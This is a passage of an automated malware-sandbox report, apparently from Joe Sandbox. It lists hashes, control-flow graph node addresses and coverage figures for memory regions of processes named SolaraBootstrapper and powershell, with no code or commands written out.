                          • Instruction ID: 647694b59d4d25a38e75d7a0ceef9f6d8b4e1979a3866f5de1800e86898f2eab
                          • Opcode Fuzzy Hash: 9ca396318575f9737b4fb590426172653f33866ee9dcf06407e3143ae7647333
                          • Instruction Fuzzy Hash: 57412370E01608DFDB69DFA9D894AAEBBF2BF89310F108429D855B7394DB70584ACF40
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dab259a8a693b86a6b5c1094ffd8de1ac7b2091fd2822512b798d1c9e31400b0
                          • Instruction ID: 7776d5213fd7f4529d4c28f0e900bf5543d5e00320243bdec143f261dd421f96
                          • Opcode Fuzzy Hash: dab259a8a693b86a6b5c1094ffd8de1ac7b2091fd2822512b798d1c9e31400b0
                          • Instruction Fuzzy Hash: 5D21F575D01208DFDB19DFA4D599ADEBBF2AF89300F209469D802B72A1CB315D09CB54
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d740ef49dc0fda5b861d7b76089a66f3f27bb7db6331867f1d7cefb7f5021cc3
                          • Instruction ID: 898e89cd5079c8141a5378c2c03af7e07acc19a225e4b53675dce04416973ac2
                          • Opcode Fuzzy Hash: d740ef49dc0fda5b861d7b76089a66f3f27bb7db6331867f1d7cefb7f5021cc3
                          • Instruction Fuzzy Hash: 4C21F475E01208CFDB19DFA5D598ADEBBF2AB89300F209469D801B73A1DB315D08CBA4
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 69ec557d4dc74be7449d195839311528f00b504d5617017143492e365bcdd9c4
                          • Instruction ID: 5cf53b8257ffdbdeb99d4d0c85cfeca2c95aeb5125ffe8049f8152119de5f08f
                          • Opcode Fuzzy Hash: 69ec557d4dc74be7449d195839311528f00b504d5617017143492e365bcdd9c4
                          • Instruction Fuzzy Hash: 0BF0ED70985284DFC702DF78F958AED3BB5AB82304F8405E9D4409B262EB305E18EB14
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2154322374.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_2700000_SolaraBootstrapper.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15c93cd90aeeec8e0915a710a046438c5a96c0306ca652483550691cc225bcf5
                          • Instruction ID: 56d4c687b2101dc4539836595246e7c00611ddc6d9b46c109585b0fa5a67a857
                          • Opcode Fuzzy Hash: 15c93cd90aeeec8e0915a710a046438c5a96c0306ca652483550691cc225bcf5
                          • Instruction Fuzzy Hash: 1EE04F70981208EFC701EFB8E509A9D77F9EB41314F8045A8D80497250EB716E18EB44

                          Execution Graph

                          Execution Coverage: 6.3%
                          Dynamic/Decrypted Code Coverage: 0%
                          Signature Coverage: 0%
                          Total number of Nodes: 3
                          Total number of Limit Nodes: 0
                          execution_graph 20973 8647160 20974 86471a3 SetThreadToken 20973->20974 20975 86471d1 20974->20975

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 49ab570-49ab599 661 49ab59b 660->661 662 49ab59e-49ab8d9 call 49aab94 660->662 661->662 723 49ab8de-49ab8e5 662->723
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc61222dc4764fe5e61951612073b7afb1d95bc1487d8d67e9807e6588f50ab2
                          • Instruction ID: d84e531370e5abce7c3c7414d2f60a3cd5aacdadbefe9a654bd354c3382767d6
                          • Opcode Fuzzy Hash: cc61222dc4764fe5e61951612073b7afb1d95bc1487d8d67e9807e6588f50ab2
                          • Instruction Fuzzy Hash: E3915170B007145BEB59EFB489109AEB7E3EFC4600B00C92DD506AB398DF75AE098BD5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 724 49ab580-49ab599 725 49ab59b 724->725 726 49ab59e-49ab8d9 call 49aab94 724->726 725->726 787 49ab8de-49ab8e5 726->787
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5b03407574271ce5fa1f59e797039915a3512e860376d716df525de4d981ecf
                          • Instruction ID: 2abf3a8668287fdd1c37a893e609f8264bf9dc052c35b5c9ba8c8a83ce39df7d
                          • Opcode Fuzzy Hash: e5b03407574271ce5fa1f59e797039915a3512e860376d716df525de4d981ecf
                          • Instruction Fuzzy Hash: 46916070B007145BEB59EFB489106AEB7E7EFC4600B00C92DD506AB398DF75AE098BD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$JPl$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-3034988559
                          • Opcode ID: 7894ff360d8a9937fc647ae1f7fedc81f6fad6211e18dd315935e1c38a22fd6c
                          • Instruction ID: 8d4d34e984c0912cc9cbe35dba6ce2338a99c6050c97a6203135e9856fdf15c5
                          • Opcode Fuzzy Hash: 7894ff360d8a9937fc647ae1f7fedc81f6fad6211e18dd315935e1c38a22fd6c
                          • Instruction Fuzzy Hash: A72215F1B002059FEB21DB68C941EABBBE6FF85211F04807AEC19CB651DB35D945C7A2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 7353ce8-7353d0d 206 7353f00-7353f4a 205->206 207 7353d13-7353d18 205->207 217 7353f50-7353f55 206->217 218 73540ce-7354112 206->218 208 7353d30-7353d34 207->208 209 7353d1a-7353d20 207->209 210 7353eb0-7353eba 208->210 211 7353d3a-7353d3c 208->211 213 7353d24-7353d2e 209->213 214 7353d22 209->214 219 7353ebc-7353ec5 210->219 220 7353ec8-7353ece 210->220 215 7353d4c 211->215 216 7353d3e-7353d4a 211->216 213->208 214->208 224 7353d4e-7353d50 215->224 216->224 225 7353f57-7353f5d 217->225 226 7353f6d-7353f71 217->226 234 7354228-735425d 218->234 235 7354118-735411d 218->235 222 7353ed4-7353ee0 220->222 223 7353ed0-7353ed2 220->223 228 7353ee2-7353efd 222->228 223->228 224->210 231 7353d56-7353d75 224->231 232 7353f61-7353f6b 225->232 233 7353f5f 225->233 229 7353f77-7353f79 226->229 230 7354080-735408a 226->230 237 7353f89 229->237 238 7353f7b-7353f87 229->238 239 7354097-735409d 230->239 240 735408c-7354094 230->240 270 7353d85 231->270 271 7353d77-7353d83 231->271 232->226 233->226 260 735425f-7354281 234->260 261 735428b-7354295 234->261 242 7354135-7354139 235->242 243 735411f-7354125 235->243 244 7353f8b-7353f8d 237->244 238->244 245 73540a3-73540af 239->245 246 735409f-73540a1 239->246 253 735413f-7354141 242->253 254 73541da-73541e4 242->254 249 7354127 243->249 250 7354129-7354133 243->250 244->230 251 7353f93-7353fb2 244->251 252 73540b1-73540cb 245->252 246->252 249->242 250->242 296 7353fb4-7353fc0 251->296 297 7353fc2 251->297 258 7354151 253->258 259 7354143-735414f 253->259 263 73541e6-73541ee 254->263 264 73541f1-73541f7 254->264 269 7354153-7354155 258->269 259->269 302 73542d5-73542fe 260->302 303 7354283-7354288 260->303 265 7354297-735429c 261->265 266 735429f-73542a5 261->266 273 73541fd-7354209 264->273 274 73541f9-73541fb 264->274 276 73542a7-73542a9 266->276 277 73542ab-73542b7 266->277 269->254 280 735415b-735415d 269->280 279 7353d87-7353d89 270->279 271->279 275 735420b-7354225 273->275 
274->275 282 73542b9-73542d2 276->282 277->282 279->210 284 7353d8f-7353d96 279->284 285 7354177-735417e 280->285 286 735415f-7354165 280->286 284->206 288 7353d9c-7353da1 284->288 292 7354196-73541d7 285->292 293 7354180-7354186 285->293 289 7354167 286->289 290 7354169-7354175 286->290 298 7353da3-7353da9 288->298 299 7353db9-7353dc8 288->299 289->285 290->285 300 7354188 293->300 301 735418a-7354194 293->301 306 7353fc4-7353fc6 296->306 297->306 308 7353dad-7353db7 298->308 309 7353dab 298->309 299->210 318 7353dce-7353dec 299->318 300->292 301->292 320 7354300-7354326 302->320 321 735432d-7354335 302->321 306->230 307 7353fcc-7354003 306->307 328 7354005-735400b 307->328 329 735401d-7354024 307->329 308->299 309->299 318->210 332 7353df2-7353e17 318->332 320->321 330 7354337-7354345 321->330 331 7354346-7354348 321->331 334 735400d 328->334 335 735400f-735401b 328->335 336 7354026-735402c 329->336 337 735403c-735407d 329->337 330->331 338 7354354-735435c 331->338 339 735434a-7354353 331->339 332->210 354 7353e1d-7353e24 332->354 334->329 335->329 344 7354030-735403a 336->344 345 735402e 336->345 342 7354395-735439f 338->342 343 735435e-735437b 338->343 339->338 346 73543a1-73543a5 342->346 347 73543a8-73543ae 342->347 356 73543e5-73543ea 343->356 357 735437d-735438f 343->357 344->337 345->337 351 73543b4-73543c0 347->351 352 73543b0-73543b2 347->352 355 73543c2-73543e2 351->355 352->355 358 7353e26-7353e41 354->358 359 7353e6a-7353e9d 354->359 356->357 357->342 365 7353e43-7353e49 358->365 366 7353e5b-7353e5f 358->366 374 7353ea4-7353ead 359->374 369 7353e4d-7353e59 365->369 370 7353e4b 365->370 371 7353e66-7353e68 366->371 369->366 370->366 371->374
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$4'jq$4'jq
                          • API String ID: 0-4000621977
                          • Opcode ID: cf5163ae5796f87ff726e3bbcec72b0ca4dff86f88f072289fec2ce50f125772
                          • Instruction ID: c0cf01dde95228cec3466cfca87847e6099ba4ffa330541807ec5d1e2c5cd423
                          • Opcode Fuzzy Hash: cf5163ae5796f87ff726e3bbcec72b0ca4dff86f88f072289fec2ce50f125772
                          • Instruction Fuzzy Hash: F21277B17042558FEB158B68C811F6BBBA6AFC1354F14847ADD09CF291DB36CD82C7A2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 378 864715a-864719b 379 86471a3-86471cf SetThreadToken 378->379 380 86471d1-86471d7 379->380 381 86471d8-86471f5 379->381 380->381
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.2261989415.0000000008640000.00000040.00000800.00020000.00000000.sdmp, Offset: 08640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_8640000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: 88b40d71964e8e670a0727a581e476812fbab970fce86ed5fa3832f783f395d5
                          • Instruction ID: 2ccd70d5912830cbccf1075263d08cfbf03096e4b2a80b862e031f41e7a0b9d6
                          • Opcode Fuzzy Hash: 88b40d71964e8e670a0727a581e476812fbab970fce86ed5fa3832f783f395d5
                          • Instruction Fuzzy Hash: 6B1113B59002488FCB10DFAAD985AEEFFF4EF89320F248459D519A7250C778A945CFA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 384 8647160-86471cf SetThreadToken 386 86471d1-86471d7 384->386 387 86471d8-86471f5 384->387 386->387
                          APIs
                          Memory Dump Source
                          • Source File: 00000011.00000002.2261989415.0000000008640000.00000040.00000800.00020000.00000000.sdmp, Offset: 08640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_8640000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: dbadf66976a844ec429665c3fa1cd7b9147d2004c6a9d15fd06e22796e08838f
                          • Instruction ID: f57d5296b2ed2d07073b42d94968752592605eebfe2221c34550193405ddd7ee
                          • Opcode Fuzzy Hash: dbadf66976a844ec429665c3fa1cd7b9147d2004c6a9d15fd06e22796e08838f
                          • Instruction Fuzzy Hash: E211F2B59002488FCB10DF9AD984B9EFBF8EF49320F24846AD519A7350C778A945CFA5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 390 49a70a8-49a70c7 391 49a71cd-49a720b 390->391 392 49a70cd-49a70d0 390->392 422 49a70d2 call 49a775f 392->422 423 49a70d2 call 49a7744 392->423 394 49a70d8-49a70ea 397 49a70ec-49a70f4 394->397 398 49a70f6-49a710b 394->398 397->398 405 49a7111-49a7121 398->405 406 49a7196-49a71af 398->406 408 49a712d-49a7138 405->408 409 49a7123 405->409 411 49a71ba-49a71bb 406->411 412 49a71b1 406->412 424 49a713b call 49ac010 408->424 425 49a713b call 49ac000 408->425 409->408 411->391 412->411 415 49a7141-49a7145 416 49a7147-49a7157 415->416 417 49a7185-49a7190 415->417 418 49a7159-49a7171 416->418 419 49a7173-49a717d 416->419 417->405 417->406 418->417 419->417 422->394 423->394 424->415 425->415
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: dacd9e27d2e11d39bb60dcf29c5d1c3955cfd455c1a77fe276bee5204099d8dc
                          • Instruction ID: 52a7b424f6f9692307346012bffded72be5dadb83d7fb11958d5209404665708
                          • Opcode Fuzzy Hash: dacd9e27d2e11d39bb60dcf29c5d1c3955cfd455c1a77fe276bee5204099d8dc
                          • Instruction Fuzzy Hash: DC414134B042448FDB14DFA8C499AADBBF6EF8D315F1444A9D806AB391DB35EC01CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 426 49ab088-49ab091 call 49aa87c 428 49ab096-49ab09a 426->428 429 49ab0aa-49ab145 428->429 430 49ab09c-49ab0a9 428->430 436 49ab14e-49ab16b 429->436 437 49ab147-49ab14d 429->437 437->436
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (&jq
                          • API String ID: 0-3222446104
                          • Opcode ID: c685b31134793de7aa71479855ff3da2e7aee117ab9ba68511d458d4adeee6dd
                          • Instruction ID: 83567b770667aec62d4321942af1f2ca34d0ad1e89d2d0a4a2554b304cb38d9d
                          • Opcode Fuzzy Hash: c685b31134793de7aa71479855ff3da2e7aee117ab9ba68511d458d4adeee6dd
                          • Instruction Fuzzy Hash: DF21AE71A042588FCB14DFAED844BAEBFF5EB89320F14846AD519A7340CA74A905CBE5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 788 49a29f0-49a2a1e 789 49a2a24-49a2a3a 788->789 790 49a2af5-49a2b37 788->790 791 49a2a3f-49a2a52 789->791 792 49a2a3c 789->792 795 49a2b3d-49a2b56 790->795 796 49a2c51-49a2c67 790->796 791->790 797 49a2a58-49a2a65 791->797 792->791 798 49a2b5b-49a2b69 795->798 799 49a2b58 795->799 800 49a2a6a-49a2a7c 797->800 801 49a2a67 797->801 798->796 806 49a2b6f-49a2b79 798->806 799->798 800->790 809 49a2a7e-49a2a88 800->809 801->800 807 49a2b7b-49a2b7d 806->807 808 49a2b87-49a2b94 806->808 807->808 808->796 810 49a2b9a-49a2baa 808->810 811 49a2a8a-49a2a8c 809->811 812 49a2a96-49a2aa6 809->812 813 49a2baf-49a2bbd 810->813 814 49a2bac 810->814 811->812 812->790 815 49a2aa8-49a2ab2 812->815 813->796 820 49a2bc3-49a2bd3 813->820 814->813 816 49a2ac0-49a2af4 815->816 817 49a2ab4-49a2ab6 815->817 817->816 821 49a2bd8-49a2be5 820->821 822 49a2bd5 820->822 821->796 825 49a2be7-49a2bf7 821->825 822->821 826 49a2bf9 825->826 827 49a2bfc-49a2c08 825->827 826->827 827->796 829 49a2c0a-49a2c24 827->829 830 49a2c29 829->830 831 49a2c26 829->831 832 49a2c2e-49a2c38 830->832 831->830 833 49a2c3d-49a2c50 832->833
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b91ef4dbd1f8b597163333607dbf91060e0a50211564667a666dddcb1005f0d
                          • Instruction ID: f2f497997a85dd56b124a09804ea23c2892f14204fa4cfe4d30ba4af6688120b
                          • Opcode Fuzzy Hash: 3b91ef4dbd1f8b597163333607dbf91060e0a50211564667a666dddcb1005f0d
                          • Instruction Fuzzy Hash: A4919974A006099FCB15CF58C5949BEFBB1FF89310B2486A9D815AB3A5C735FC91CBA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 968 49abbb0-49abc40 972 49abc42 968->972 973 49abc46-49abc51 968->973 972->973 974 49abc53 973->974 975 49abc56-49abcb0 call 49ab088 973->975 974->975 982 49abcb2-49abcb7 975->982 983 49abd01-49abd05 975->983 982->983 984 49abcb9-49abcdc 982->984 985 49abd16 983->985 986 49abd07-49abd11 983->986 990 49abce2-49abced 984->990 987 49abd1b-49abd1d 985->987 986->985 988 49abd1f-49abd40 987->988 989 49abd42-49abd45 call 49aa870 987->989 995 49abd4a-49abd4e 988->995 989->995 992 49abcef-49abcf5 990->992 993 49abcf6-49abcff 990->993 992->993 993->987 996 49abd50-49abd79 995->996 997 49abd87-49abdb6 995->997 996->997
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 491f47f41062809d5a9e990db4714adf35351f007c38dad30df171136425cc07
                          • Instruction ID: 3762bfaafe3656f935a4a28a2ba69cb2ad977a59b55265c208eb8dd4e91ec9bf
                          • Opcode Fuzzy Hash: 491f47f41062809d5a9e990db4714adf35351f007c38dad30df171136425cc07
                          • Instruction Fuzzy Hash: EF612771E003489FDB14DFA9D984A9DBBF6FF88310F148129E918AB354EB35AC45CB90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1007 49a7808-49a783e 1010 49a7840-49a7842 1007->1010 1011 49a7847-49a7850 1007->1011 1012 49a78f1-49a78f6 1010->1012 1014 49a7859-49a7877 1011->1014 1015 49a7852-49a7854 1011->1015 1018 49a7879-49a787b 1014->1018 1019 49a787d-49a7881 1014->1019 1015->1012 1018->1012 1020 49a7883-49a7888 1019->1020 1021 49a7890-49a7897 1019->1021 1020->1021 1022 49a7899-49a78c2 1021->1022 1023 49a78f7-49a7928 1021->1023 1026 49a78d0 1022->1026 1027 49a78c4-49a78ce 1022->1027 1033 49a79aa-49a79ae 1023->1033 1034 49a792e-49a7985 1023->1034 1029 49a78d2-49a78de 1026->1029 1027->1029 1035 49a78e0-49a78e2 1029->1035 1036 49a78e4-49a78eb 1029->1036 1047 49a79b1 call 49a7a08 1033->1047 1048 49a79b1 call 49a7a00 1033->1048 1043 49a7991-49a799f 1034->1043 1044 49a7987 1034->1044 1035->1012 1036->1012 1038 49a79b4-49a79b9 1043->1033 1046 49a79a1-49a79a9 1043->1046 1044->1043 1047->1038 1048->1038
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f475816ddc9a0515554948b22d338d9490c329db8e286a3e8a7f70c755aab4c6
                          • Instruction ID: 0bd6acd00e05bbd0632fc5cbaa3e41a8c66e20f4f38d75d510eccb128a5d8699
                          • Opcode Fuzzy Hash: f475816ddc9a0515554948b22d338d9490c329db8e286a3e8a7f70c755aab4c6
                          • Instruction Fuzzy Hash: C0519E347002149FD7149BADD885A6A77EAFFC8314F1488B9E509CB356EB35EC02CBA1
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 56f0fd81c42c1c1c04f0d96be854f18cdaecd8dcc2160edbb7d60a0cbdcf6960
                          • Instruction ID: d99abd9fa340765c59d298a6cbc0b02b5552f18392c1fc4137e66f75a9aeed2c
                          • Opcode Fuzzy Hash: 56f0fd81c42c1c1c04f0d96be854f18cdaecd8dcc2160edbb7d60a0cbdcf6960
                          • Instruction Fuzzy Hash: B1514871E013489FCB54CFA9D584A8DBBF6EF88310F148069E918AB365EB34A845CB90
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87192b5edbf4093d42cc057238b9d4c0fa0f2230f471426ab58ccc7cb41a0bcd
                          • Instruction ID: 7665be42b8095b927b127bdbd4c0902d5f4abc0a7c4e339e0e915cfb26ccae16
                          • Opcode Fuzzy Hash: 87192b5edbf4093d42cc057238b9d4c0fa0f2230f471426ab58ccc7cb41a0bcd
                          • Instruction Fuzzy Hash: E841C734A082848FCB15CFA4C899AAD7FF1EF8A311F1945E9D441AB3A2CA34DC41CB61
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3522de4814b43d2b037cc4a15bdd000b4cedd3b75b66e6d2d7560d58e9c34c02
                          • Instruction ID: fb23a4ae828daaca2d6e0805325a12b1110e935c5255e9405dbe219667824d62
                          • Opcode Fuzzy Hash: 3522de4814b43d2b037cc4a15bdd000b4cedd3b75b66e6d2d7560d58e9c34c02
                          • Instruction Fuzzy Hash: C04129F2A05202CFEB218F28C551EAABBF69F81798F1480A9DD088F651D735DD46C7A1
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c76e7dba9b76c6aaf13508c83121759b1b54b8feb6b6500e3f13c652e7b46dd2
                          • Instruction ID: a0e067f5566e6a376a3b11498f24a8943bd1cd3ca923e37bd8cadfd8402ab08e
                          • Opcode Fuzzy Hash: c76e7dba9b76c6aaf13508c83121759b1b54b8feb6b6500e3f13c652e7b46dd2
                          • Instruction Fuzzy Hash: 05413874A006059FCB05CF58C5989EEFBB1FF49310B1186A9D816AB364C736FCA1CBA0
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 856ec1abc3f1460515f68f96003913f7db9e26ec2ebc612372ffb768f4d4432b
                          • Instruction ID: 2f4f939c828972f485f9a0b64a0ccdd68541115fbb0dfb4121cad29e6b886683
                          • Opcode Fuzzy Hash: 856ec1abc3f1460515f68f96003913f7db9e26ec2ebc612372ffb768f4d4432b
                          • Instruction Fuzzy Hash: 843170353016019FD709EB78E844B9AB79AEFC4215F048639E50ACB365DF75E805CBE1
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1ee03c35c81a4c70bcf06d75c3f41cb730a96b0d0b60238ead92076516795d2
                          • Instruction ID: 50ef9383293ac100c3bb5879667afa85682b8fdb70e640121e6588847c9ca13a
                          • Opcode Fuzzy Hash: e1ee03c35c81a4c70bcf06d75c3f41cb730a96b0d0b60238ead92076516795d2
                          • Instruction Fuzzy Hash: 48314D70A012099FDB08DFA9D4946AEBFF6AF89310F14802DE505EB364EA759C45CB91
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22a2b0cb644ae01f6a678c0065380d739ad6427a93a604abda520ab7fcdb5a13
                          • Instruction ID: 98a5c09700f1f7152aacbff1982834f4a22f11e71d60dfe55de32bc12988102b
                          • Opcode Fuzzy Hash: 22a2b0cb644ae01f6a678c0065380d739ad6427a93a604abda520ab7fcdb5a13
                          • Instruction Fuzzy Hash: B8319274A002459FEB41EFA8D854ABE7BF6EF84304F1188B9C511AB3E5CA749D41CB51
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d3ff6d369394243fafa885ed0c2afe72a7071dc0ff07bc627936352800f29d8d
                          • Instruction ID: f9c82912cb5efd4646bfe872e26ff587b7aa42d4bfd74d39b10e6cd3a708ce13
                          • Opcode Fuzzy Hash: d3ff6d369394243fafa885ed0c2afe72a7071dc0ff07bc627936352800f29d8d
                          • Instruction Fuzzy Hash: 47314C70A016099FDB08DFA9C5947AEBAF6EFC8300F108039E905EB354EA75AC018B95
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4debb227519682512dd7bc95672b4b85681c2afd5052bb61175626415c1a055d
                          • Instruction ID: fb4126bff8d55e8a9d942a17f8dfc56dbb9c80a66d7cf5274b120610cdac3d16
                          • Opcode Fuzzy Hash: 4debb227519682512dd7bc95672b4b85681c2afd5052bb61175626415c1a055d
                          • Instruction Fuzzy Hash: E8315E70A006048FCB14DF69E458A9DBBF2EF89314F048969D806EB365DF74AC41CB91
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c13e62ea5ed94c16d86f96ba81b2faabc0118279b569b9df3a37a487f9e2e1c7
                          • Instruction ID: 1414fedb540c5250e1bbad37584de325df1067f0f8108b3bd2c8fc9aa57c8443
                          • Opcode Fuzzy Hash: c13e62ea5ed94c16d86f96ba81b2faabc0118279b569b9df3a37a487f9e2e1c7
                          • Instruction Fuzzy Hash: 5F314970A002058FCB14DF69D458A9EBBF6FF89314F048969D806EB3A4DF74AC41CB90
                          Memory Dump Source
